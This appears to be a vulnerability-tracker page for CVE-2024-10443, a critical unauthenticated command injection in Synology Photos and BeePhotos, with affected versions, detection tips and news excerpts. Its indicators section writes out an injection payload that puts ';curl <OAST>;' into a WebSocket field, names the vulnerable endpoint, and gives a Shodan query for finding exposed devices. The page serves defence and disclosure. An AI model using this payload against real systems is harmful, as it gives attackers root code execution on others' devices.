CVE-2024-10443
published 2024-11-15CVE-2024-10443: Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Task Manager component in Synology BeePhotos before…
PriorityP184critical9.8CVSS 3.1
AVNACLPRNUINSUCHIHAH
EXPLOIT
EPSS
28.38%
97.9th percentile
Improper neutralization of special elements used in an OS command ('OS Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
Affected
8 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| synology | beephotos | < 1.1.0-10053 | 1.1.0-10053 |
| synology | beephotos | < 1.0.2-10026 | 1.0.2-10026 |
| synology | beephotos | >= * < 1.1.0-10053 | 1.1.0-10053 |
| synology | beephotos | >= * < 1.0.2-10026 | 1.0.2-10026 |
| synology | photos | < 1.6.2-0720 | 1.6.2-0720 |
| synology | photos | < 1.7.0-0795 | 1.7.0-0795 |
| synology | synology_photos | >= * < 1.7.0-0795 | 1.7.0-0795 |
| synology | synology_photos | >= * < 1.6.2-0720 | 1.6.2-0720 |
Detection & IOCsextracted from sources · hover to see the quote
urlws://[host]/FotoSocketIo/socket.io/?transport=websocket&EIO=4
path/FotoSocketIo/socket.io/
command42["page-view",{"id_user": ";curl <OAST>;", "timestamp": 0, "location": "xxd"}]
othershodan-query: html:"BeeStation"
- →Exploit arrives as an unauthenticated WebSocket connection to /FotoSocketIo/socket.io/?transport=websocket&EIO=4; monitor for WebSocket upgrade requests to this path from untrusted sources.
- →The injection is delivered inside the 'id_user' field of a 'page-view' WebSocket event (Socket.IO message type 42); alert on semicolon-delimited shell commands in that field.
- →The vulnerability is zero-click and requires no authentication; any inbound WebSocket connection to the Task Manager endpoint should be treated as suspicious on unpatched devices. ↗
- →Use Shodan dork html:"BeeStation" to identify Internet-exposed vulnerable devices for proactive scanning and patching.
- →Exploitation results in code execution as root; look for unexpected outbound curl/DNS requests originating from the Synology Photos or BeePhotos process after a WebSocket page-view event.
- ·Patches are NOT automatically applied; administrators must manually upgrade to the fixed versions to remediate the vulnerability. ↗
- ·The Nuclei PoC template requires the websocket-client Python package and Python 3 to be pre-installed on the system running the scanner.
CVEs like this are exactly what “Exploited This Week” covers.
Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.
No detection rules found.
Nuclei
Synology BeeStation BST150-4T - Unauthenticated Command Injection
nuclei·CVSS 9.8
CVE-2024-10443 [CRITICAL] Synology BeeStation BST150-4T - Unauthenticated Command Injection
Synology BeeStation BST150-4T - Unauthenticated Command Injection
Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote attackers to execute arbitrary code via unspecified vectors.
Template:
id: CVE-2024-10443
info:
name: Synology BeeStation BST150-4T - Unauthenticated Command Injection
author: iamnoooob,pdresearch
severity: critical
description: |
Improper neutralization of special elements used in a command ('Command Injection') vulnerability in Task Manager component in Synology BeePhotos before 1.0.2-10026 and 1.1.0-10053 and Synology Photos before 1.6.2-0720 and 1.7.0-0795 allows remote att
Checkpoint
4th November – Threat Intelligence Report
blogs_checkpoint·2024-11-04
CVE-2024-10443 4th November – Threat Intelligence Report
Latest Publications
CPR Podcast Channel
AI Research
Web 3.0 Security
Intelligence Reports
ThreatCloud AI
Threat Intelligence & Research
Zero Day Protection
Sandblast File Analysis
About Us
SUBSCRIBE
2026
2025
2024
2023
2022
2021
2020
2019
2018
2017
2016
## 4th November – Threat Intelligence Report
For the latest discoveries in cyber research for the week of 4th November, please download our Threat Intelligence Bulletin .
TOP ATTACKS AND BREACHES
Free, the second-largest telecom company in France, has been hit by a cyberattack resulting in unauthorized access to personal data associated with certain subscriber accounts. The incident surfaced following an attempted sale of stolen customer data on a cybercrime forum, impacting potentially up to 19 million customers.
Bleepingcomputer
Synology hurries out patches for zero-days exploited at Pwn2Own
blogs_bleepingcomputer·2024-11-01·CVSS 9.8
CVE-2024-10443 [CRITICAL] Synology hurries out patches for zero-days exploited at Pwn2Own
## Synology hurries out patches for zero-days exploited at Pwn2Own
## Sergiu Gatlan
Synology, a Taiwanese network-attached storage (NAS) appliance maker, patched two critical zero-days exploited during last week's Pwn2Own hacking competition within days.
Midnight Blue security researcher Rick de Jager found the critical zero-click vulnerabilities (tracked together as CVE-2024-10443 and dubbed RISK:STATION ) in the company's Synology Photos and BeePhotos for BeeStation software.
As Synology explains in security advisories published two days after the flaws were demoed at Pwn2Own Ireland 2024 to hijack a Synology BeeStation BST150-4T device, the security flaws enable remote attackers to gain remote code execution as root on vulnerable NAS appliances exposed online.
"The vulnerability wa
2024-11-15
Published